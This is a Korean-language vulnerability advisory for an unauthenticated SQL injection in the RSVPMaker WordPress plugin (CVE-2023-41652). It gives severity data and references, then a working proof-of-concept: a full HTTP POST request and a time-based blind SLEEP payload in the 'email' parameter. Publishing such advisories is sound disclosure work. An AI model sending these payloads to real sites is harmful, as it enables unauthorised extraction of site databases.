
RSVPMarker <= 10.6.6 - 인증되지 않은 SQL 인젝션
RSVPMarker <= 10.6.6 - 인증되지 않은 SQL 인젝션
WordPress용 RSVPMarker 플러그인은 사용자 제공 파라미터에 대한 이스케이프 처리가 불충분하고 기존 SQL 쿼리에 대한 충분한 준비가 부족하여 최신 버전 10.6.6까지의 버전에서 'email' 파라미터를 통한 SQL 인젝션에 취약합니다. 이로 인해 인증되지 않은 공격자가 기존 쿼리에 추가 SQL 쿼리를 추가하여 데이터베이스에서 민감한 정보를 추출할 수 있습니다.
Severity: critical
CVE ID: CVE-2023-41652
CVSS Score: 9.8
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Plugin Slug: rsvpmaker
WPScan URL: https://www.wpscan.com/plugin/rsvpmaker
Reference URL: https://www.wordfence.com/threat-intel/vulnerabilities/id/f655704d-70a1-40d8-ae36-39029185d262?source=api-prod
POST /wp-json/rsvpmaker/v1/rsvpmailer_member/[email protected] HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://kubernetes.docker.internal/
X-Requested-With: XMLHttpRequest
Origin: http://kubernetes.docker.internal
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
[email protected]'%20and%20(select*from(select(sleep(5)))a)--%20
Parameter: email (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 time-based blind (query SLEEP)
Payload: [email protected]'XOR(SELECT(0)FROM(SELECT(SLEEP(8)))a)XOR'Z